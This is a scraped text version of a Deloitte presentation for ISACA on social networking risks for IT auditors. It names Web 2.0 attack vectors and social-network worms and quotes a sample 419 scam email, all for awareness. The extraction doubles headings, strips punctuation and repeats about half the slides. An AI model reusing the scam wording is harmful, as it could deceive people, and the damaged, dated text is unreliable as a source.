Upload
trinhtruc
View
214
Download
2
Embed Size (px)
Citation preview
wwwisacaorg
The impact of social networking The impact of social networking on the IT audit universeon the IT audit universe
PresenterPresenterNelson Gibbs CIA CISA CISM CGEIT CISSPNelson Gibbs CIA CISA CISM CGEIT CISSP
Deloitte amp Touche LLPDeloitte amp Touche LLP
wwwisacaorg2
Todayrsquos agendaTodayrsquos agenda
bull Definitions and terminology (3-17)bull Why and how companies are using social networking (18-33)bull Risks and challenges (34-52)bull What is next in the world of social networking (53-56)bull QampA
wwwisacaorg3
Definitions and terminologyDefinitions and terminology
wwwisacaorg4
Social network Social network mdashmdash Some definitionsSome definitions
bull As defined in Wikipediandash A social network is a social structure made
of nodes (which are generally individuals or organizations) that are tied by one or more specific types of interdependency such as values visions ideas financial exchange friendship kinship dislike conflict or trade The resulting structures are often very complex
bull As defined in Webmasterndash Social networking is a phenomena defined by linking people to each
other in some way Digg is a popular example of a social network (using social bookmarking) Users work together to rate news and are linked by rating choices or explicit identification of other members Generally social networks are used to allow or encourage various types of activity whether commercial social or some combination of the two
wwwisacaorg5
What makes a Social Network so powerfulWhat makes a Social Network so powerful
bull Metcalfersquos lawndash The value of a telecommunications network is proportional to
the square of the number of connected users of the system (n2)
bull Related to the fact that the number of unique connections in a network of a number of nodes (n) can be expressed mathematically as the triangular number n(nndash1)2 which is proportional to n2 asymptoticallyhttpenwikipediaorgwikiMetcalfersquos_Law
bull Applying this to Social Networking mdash Consider LinkedIn mdashit took 16 months to reach the first one million users The latest million users were added in just 11 days
wwwisacaorg6
What makes a Social Network so powerful What makes a Social Network so powerful (cont)(cont)
bull Web 20ndash ldquoWeb 20rdquo was first coined in 1999 and by 2004 had become used to describe the
next evolution of the Web ndash Itrsquos based on the notion that people who consume media access the Internet and use
the Web shouldnrsquot passively absorb the flow of content from provider to viewer rather they should be active contributors helping customize media and technology for their own purposes
ndash Social network sites blogs wikis and other collaborative technologies are the result
Web 10 (Yesterday)
Power lies with institutionsplatforms and technologybull Structuredbull Siloedbull One size fits allbull Passive audiencebull Unilateral
Web 20 (Today)
Power lies with userscommunities and experiencesbull Flexiblebull Collaborativebull Communitiesbull Engaged usersbull Multilateral
wwwisacaorg7
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Mapping and measuring of relationships and flows among people groups organizations computers or other information knowledge processing entities
bull The nodes in the network are the people and groups while the links show relationships or flows between the nodes
bull Provides both a visual and a mathematical analysis of human relationships
Social network analysis
wwwisacaorg8
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Web sites where entries are made (such as in a journal or diary) displayed in a reverse chronological order often provide commentary or news on a particular subject
bull Some function as personal online diaries or logbooksbull Combine text images and links to other blogs and Web
sitesbull Typically provide archives in calendar form local search
syndication feeds reader comment posting trackback links from other blogs blogroll links to other recommended blogs and categories of entries tagged for retrieval by topic
Blogs
wwwisacaorg9
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Short frequent posts with questions information or current status
bull Twitter (public) and Yammer (private) are two examplesbull Social software (including Facebook LinkedIn and
MySpace) now prompts for ldquowhatrsquos on your mindrdquo or similar status or mood lines
Microblogging
wwwisacaorg10
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Web sites which allow users to easily add remove edit and change most available content
bull Effective for collaborative writing and self-service Web site creation and maintenance
Wikis
wwwisacaorg11
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Wikipedia ndash perhaps the best known Wikindash Launched on 15 January 2000ndash First edit on 16 January followed by 1000 articles in the first
month ndash Now has 17 million articles in 270 languages all written by
volunteers ndash Billionth edit took place on 16 April 2010 ndash Used by 400 million people every month ndash Claims to have 80000 editors although reports suggest that it
has recently lost thousands something Wikipedia disputes ndash Aims to grow to one billion users by 2015 with a focus on
women and people in the developing world ndash Critics maintain that many entries are untrustworthyndash But a disputed study has shown that for subjects such as
science it comes as close as traditional encyclopedias
Statistics taken from httpwwwbbccouknewstechnology-12171977
Wikis (cont)
wwwisacaorg12
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull A range of tools which facilitate social networkingbull Personal Web pages including bios photos interests
audio and video links to friends messages from friends and personal networks
Social networking software
wwwisacaorg13
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Facebook ndash the biggest of them allndash Over 500 million registered users ndash 50 of our active users log on to Facebook in any given day ndash About 70 of Facebook users are outside the US ndash More than 30 billion pieces of content (web links news
stories blog posts notes photo albums etc) shared each month
ndash People spend over 700 billion minutes per month on Facebook
Statistics taken from httpwwwfacebookcompressinfophpstatistics (Sept 2010)
bull As of March 13 2010 Facebook was Americarsquos most popular site according to Experian Hitwise with 71 of traffic compared to Googlersquos 70
Social networking software (cont)
wwwisacaorg14
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Sites which allow users to share links to sites with othersbull Tags are metadata which classify content into categoriesbull Can be used to aid searches create tag clouds and link
disparate sources
Social bookmarking and tagging
wwwisacaorg15
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Using feeds available from a Web site to provide an updated list of its content in the form of a subscription an embedded portion of a Web site or a collection of disparate content on a particular topic
bull RSS (Really Simple Syndication) or Atom syndication and rss xml or rdf files used for the feeds
bull Mashups combine data and feeds from multiple sources to provide a single integrated set of information ldquoeg data plotted on a maprdquo
Syndication and mashups
wwwisacaorg16
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Online collections of videos and photos from usersbull Users can upload tag and rate contentVideos and
photos
wwwisacaorg17
Social Networking CompaniesSocial Networking Companies
Social Media Popular Examples
Wikis Wikitravel Wikipedia wikiHow WikiBooks the TV IV
Blogs livejournal WordPress Blogger Technorati xanga
Social Networking myspacecom LinkedIn facebook friendster plaxo
RSS(Really Simple Syndication)
newsgator Bloglines iGoogle FeedBurner
Presence and Microblogging
twitter Pownce jaiku Hictu tumblr
Social Bookmarkingand Tagging
delicious digg reddit newsvine StumbleUpon
Online Photo andVideo Sharing
YouTube flickr shutterfly last-fm slideshare
wwwisacaorg18
Why and how companies are Why and how companies are using social networkingusing social networking
wwwisacaorg19
Statistics on companies using Social Statistics on companies using Social NetworkingNetworking
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg20
Statistics on companies using Social Statistics on companies using Social Networking (cont)Networking (cont)
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg21
Companies typically adopt Social Media for Companies typically adopt Social Media for three major benefitsthree major benefits
Increase employee productivityand operational efficiencies
Foster creativity innovationand collaboration
Enhance customer andpartner relationships
1
2
3
wwwisacaorg22
Increase employee productivity and Increase employee productivity and operational efficienciesoperational efficiencies
bull Creates a lightweight institutional memory system for a companyrsquos intellectual assets to be easily captured stored and accessed
bull Reduce the net volume of e-mail and allow users to ldquopullrdquo information at their convenience as opposed to spending time reading through mass e-mail chain
bull Create better quality deliverables faster by drawing on the collective talents knowledge and experiences of other employees around the world
Operational efficienciesbull A leading energy company realized approximately $250K in annual cost savings by
conducting its employee conference virtually using Social Media
Improved reportingbull A global investment bank tightened reporting cycle times from several
weeks to ldquoabout 30 secondsrdquo per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup
wwwisacaorg23
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull American Red Crossndash Designed to incite discussions around issues the American Red Cross cares
about and describe actions individuals can take (online or offline) to help people prevent prepare for and respond to emergencies and give valuable information about preventing preparing for and responding to emergencieshttpredcrosschatorg
wwwisacaorg24
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull Deloittersquos DWikindash Provides a safe flexible knowledge creation and information sharing
environment for all Deloitte practitioners across country practice and Deloitte organizational borders
ndash Enhances the client service delivery capabilities of our Deloitte practitioners ndash Serves as a test environment for innovative concepts and solutions which
expand the business interests of Deloitte
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg25
Foster creativity innovation and Foster creativity innovation and collaborationcollaboration
bull Harness product process and service innovations by unlocking creativityand ideas from any area of the company
bull The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
bull Employees create unexpected connections with one another and expand their base of knowledge experience and circle of trusted colleagues
Product innovationbull A leading high-tech manufacturer instituted a ldquosubmit-and-vote-for-your-favorite-ideardquo
social community with its consumers generating over 5000 ideas and over 300000 votes in its first three months and subsequently identifying new product offerings
Information capturebull A federal agency created an internal wiki to bolster the capture and
dissemination of mission-critical information between field agents
wwwisacaorg26
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Best Buyndash A community of Best Buy employees who convene regularly to share
knowledge best practices frustrations aspirations and a few jokes Community members include everyone from recent high school graduates to semi retireeshttpsmixblueshirtnationcom
wwwisacaorg27
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Deloittersquos DStreetndash Enterprise talent networking site - changing the way we connect with each
otherndash Enables another way of collaboration and community buildingndash Network build new relationships and forge successful careersndash Learn about colleagues and interesting ways to introduce yourselfndash Identify new connection points to create a basis for meaningful conversationndash A new way of assembling the right team
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg28
Enhance customer and partner Enhance customer and partner relationshipsrelationships
bull Opens the lines of communication beyond typical spokespeople such as marketing sales and PR and provides an avenue for other important stakeholders (eg engineers scientists product managers) to gather firsthand feedback from customers
bull Allow customers to access help beyond traditional means with networks that provide peer support and a user-generated knowledgebase while monitoring customer perception
bull Provide a forum for collaborative business development education and communications with vendors OEMs and other partners
bull Allow consumers who know your products and services best to become a part of the new offering development process
Revenue growthbull A major consumer goods company improved sales by 315 by including
customer ratings user-generated product reviews and other social features on its online storefront also resulting in a 40 uptick in average order value
wwwisacaorg29
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Procter amp Gamblendash Capessa launched in the ldquoYahoo Healthrdquo section of Yahoocom one of the
worlds leading internet destinations Women who register with Capessayahoocom have access to several topic areas including parenting pregnancy weight loss relationships career healthy living and care givinghttprealwomenrealadvicecom
wwwisacaorg30
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull American Expressndash OPEN Forum an online resource and networking site for business owners
The site is designed to forge meaningful business connections and provide practical actionable information and insights from influential bloggers industry leaders and savvy entrepreneurshttpwwwopenforumcom
wwwisacaorg31
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull State of Louisville Kentuckyndash Interactive audit findings on Web site Allows the users to discuss previous
audit findingshttpwwwlouisvillekygovInternalAudit
wwwisacaorg32
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Amazonndash A social network for people who love books Users are able to create a
virtual shelf to show off their books see what their friends are reading and discover new books httpwwwshelfaricom
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg2
Todayrsquos agendaTodayrsquos agenda
bull Definitions and terminology (3-17)bull Why and how companies are using social networking (18-33)bull Risks and challenges (34-52)bull What is next in the world of social networking (53-56)bull QampA
wwwisacaorg3
Definitions and terminologyDefinitions and terminology
wwwisacaorg4
Social network Social network mdashmdash Some definitionsSome definitions
bull As defined in Wikipediandash A social network is a social structure made
of nodes (which are generally individuals or organizations) that are tied by one or more specific types of interdependency such as values visions ideas financial exchange friendship kinship dislike conflict or trade The resulting structures are often very complex
bull As defined in Webmasterndash Social networking is a phenomena defined by linking people to each
other in some way Digg is a popular example of a social network (using social bookmarking) Users work together to rate news and are linked by rating choices or explicit identification of other members Generally social networks are used to allow or encourage various types of activity whether commercial social or some combination of the two
wwwisacaorg5
What makes a Social Network so powerfulWhat makes a Social Network so powerful
bull Metcalfersquos lawndash The value of a telecommunications network is proportional to
the square of the number of connected users of the system (n2)
bull Related to the fact that the number of unique connections in a network of a number of nodes (n) can be expressed mathematically as the triangular number n(nndash1)2 which is proportional to n2 asymptoticallyhttpenwikipediaorgwikiMetcalfersquos_Law
bull Applying this to Social Networking mdash Consider LinkedIn mdashit took 16 months to reach the first one million users The latest million users were added in just 11 days
wwwisacaorg6
What makes a Social Network so powerful What makes a Social Network so powerful (cont)(cont)
bull Web 20ndash ldquoWeb 20rdquo was first coined in 1999 and by 2004 had become used to describe the
next evolution of the Web ndash Itrsquos based on the notion that people who consume media access the Internet and use
the Web shouldnrsquot passively absorb the flow of content from provider to viewer rather they should be active contributors helping customize media and technology for their own purposes
ndash Social network sites blogs wikis and other collaborative technologies are the result
Web 10 (Yesterday)
Power lies with institutionsplatforms and technologybull Structuredbull Siloedbull One size fits allbull Passive audiencebull Unilateral
Web 20 (Today)
Power lies with userscommunities and experiencesbull Flexiblebull Collaborativebull Communitiesbull Engaged usersbull Multilateral
wwwisacaorg7
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Mapping and measuring of relationships and flows among people groups organizations computers or other information knowledge processing entities
bull The nodes in the network are the people and groups while the links show relationships or flows between the nodes
bull Provides both a visual and a mathematical analysis of human relationships
Social network analysis
wwwisacaorg8
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Web sites where entries are made (such as in a journal or diary) displayed in a reverse chronological order often provide commentary or news on a particular subject
bull Some function as personal online diaries or logbooksbull Combine text images and links to other blogs and Web
sitesbull Typically provide archives in calendar form local search
syndication feeds reader comment posting trackback links from other blogs blogroll links to other recommended blogs and categories of entries tagged for retrieval by topic
Blogs
wwwisacaorg9
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Short frequent posts with questions information or current status
bull Twitter (public) and Yammer (private) are two examplesbull Social software (including Facebook LinkedIn and
MySpace) now prompts for ldquowhatrsquos on your mindrdquo or similar status or mood lines
Microblogging
wwwisacaorg10
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Web sites which allow users to easily add remove edit and change most available content
bull Effective for collaborative writing and self-service Web site creation and maintenance
Wikis
wwwisacaorg11
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Wikipedia ndash perhaps the best known Wikindash Launched on 15 January 2000ndash First edit on 16 January followed by 1000 articles in the first
month ndash Now has 17 million articles in 270 languages all written by
volunteers ndash Billionth edit took place on 16 April 2010 ndash Used by 400 million people every month ndash Claims to have 80000 editors although reports suggest that it
has recently lost thousands something Wikipedia disputes ndash Aims to grow to one billion users by 2015 with a focus on
women and people in the developing world ndash Critics maintain that many entries are untrustworthyndash But a disputed study has shown that for subjects such as
science it comes as close as traditional encyclopedias
Statistics taken from httpwwwbbccouknewstechnology-12171977
Wikis (cont)
wwwisacaorg12
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull A range of tools which facilitate social networkingbull Personal Web pages including bios photos interests
audio and video links to friends messages from friends and personal networks
Social networking software
wwwisacaorg13
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Facebook ndash the biggest of them allndash Over 500 million registered users ndash 50 of our active users log on to Facebook in any given day ndash About 70 of Facebook users are outside the US ndash More than 30 billion pieces of content (web links news
stories blog posts notes photo albums etc) shared each month
ndash People spend over 700 billion minutes per month on Facebook
Statistics taken from httpwwwfacebookcompressinfophpstatistics (Sept 2010)
bull As of March 13 2010 Facebook was Americarsquos most popular site according to Experian Hitwise with 71 of traffic compared to Googlersquos 70
Social networking software (cont)
wwwisacaorg14
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Sites which allow users to share links to sites with othersbull Tags are metadata which classify content into categoriesbull Can be used to aid searches create tag clouds and link
disparate sources
Social bookmarking and tagging
wwwisacaorg15
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Using feeds available from a Web site to provide an updated list of its content in the form of a subscription an embedded portion of a Web site or a collection of disparate content on a particular topic
bull RSS (Really Simple Syndication) or Atom syndication and rss xml or rdf files used for the feeds
bull Mashups combine data and feeds from multiple sources to provide a single integrated set of information ldquoeg data plotted on a maprdquo
Syndication and mashups
wwwisacaorg16
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Online collections of videos and photos from usersbull Users can upload tag and rate contentVideos and
photos
wwwisacaorg17
Social Networking CompaniesSocial Networking Companies
Social Media Popular Examples
Wikis Wikitravel Wikipedia wikiHow WikiBooks the TV IV
Blogs livejournal WordPress Blogger Technorati xanga
Social Networking myspacecom LinkedIn facebook friendster plaxo
RSS(Really Simple Syndication)
newsgator Bloglines iGoogle FeedBurner
Presence and Microblogging
twitter Pownce jaiku Hictu tumblr
Social Bookmarkingand Tagging
delicious digg reddit newsvine StumbleUpon
Online Photo andVideo Sharing
YouTube flickr shutterfly last-fm slideshare
wwwisacaorg18
Why and how companies are Why and how companies are using social networkingusing social networking
wwwisacaorg19
Statistics on companies using Social Statistics on companies using Social NetworkingNetworking
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg20
Statistics on companies using Social Statistics on companies using Social Networking (cont)Networking (cont)
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg21
Companies typically adopt Social Media for Companies typically adopt Social Media for three major benefitsthree major benefits
Increase employee productivityand operational efficiencies
Foster creativity innovationand collaboration
Enhance customer andpartner relationships
1
2
3
wwwisacaorg22
Increase employee productivity and Increase employee productivity and operational efficienciesoperational efficiencies
bull Creates a lightweight institutional memory system for a companyrsquos intellectual assets to be easily captured stored and accessed
bull Reduce the net volume of e-mail and allow users to ldquopullrdquo information at their convenience as opposed to spending time reading through mass e-mail chain
bull Create better quality deliverables faster by drawing on the collective talents knowledge and experiences of other employees around the world
Operational efficienciesbull A leading energy company realized approximately $250K in annual cost savings by
conducting its employee conference virtually using Social Media
Improved reportingbull A global investment bank tightened reporting cycle times from several
weeks to ldquoabout 30 secondsrdquo per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup
wwwisacaorg23
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull American Red Crossndash Designed to incite discussions around issues the American Red Cross cares
about and describe actions individuals can take (online or offline) to help people prevent prepare for and respond to emergencies and give valuable information about preventing preparing for and responding to emergencieshttpredcrosschatorg
wwwisacaorg24
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull Deloittersquos DWikindash Provides a safe flexible knowledge creation and information sharing
environment for all Deloitte practitioners across country practice and Deloitte organizational borders
ndash Enhances the client service delivery capabilities of our Deloitte practitioners ndash Serves as a test environment for innovative concepts and solutions which
expand the business interests of Deloitte
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg25
Foster creativity innovation and Foster creativity innovation and collaborationcollaboration
bull Harness product process and service innovations by unlocking creativityand ideas from any area of the company
bull The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
bull Employees create unexpected connections with one another and expand their base of knowledge experience and circle of trusted colleagues
